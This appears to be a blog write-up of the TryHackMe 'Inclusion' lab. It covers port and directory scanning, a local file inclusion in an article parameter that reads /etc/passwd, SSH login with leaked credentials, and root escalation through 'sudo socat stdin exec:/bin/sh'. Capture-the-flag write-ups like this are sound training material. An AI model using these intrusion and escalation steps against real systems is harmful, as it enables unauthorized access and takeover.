TryHackMe: Inclusion

[Enumeration]

  1. Port Scan
nmap -Pn <ip>

2. High port scan

nmap -Pn -p1000- <ip>

Not much useful

3. OS and services scan

nmap -p 22,80 -A <ip>

4. Vulnerability scan

nmap -p 22,80 --script vuln <ip>

Not much useful

5. Access HTTP site on port 80

View page source

Explore all pages

Try to input some value to parameter.

6. Directory discovery

gobuster dir --wordlist /usr/share/dirb/wordlists/common.txt -u http://<ip>/ -x php,txt,html

Not much useful

[Exploitation]

  1. LFI

Seems like with “http://<ip>/article?name=”, I can read /etc/passwd.

View page source for easier viewing.

There’re 2 users: root and falconfeast.
Also there’s credential comment - falconfeast:rootpassword

Try to login into SSH with the credential.

ssh falconfeast@<ip>

Success!!!

lscat user.txt

[Privilege escalation]

  1. sudo
sudo -l

There’s socat.

Look up at GTFOBin

sudo socat stdin exec:/bin/shid

Now I’m root.

lscat root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store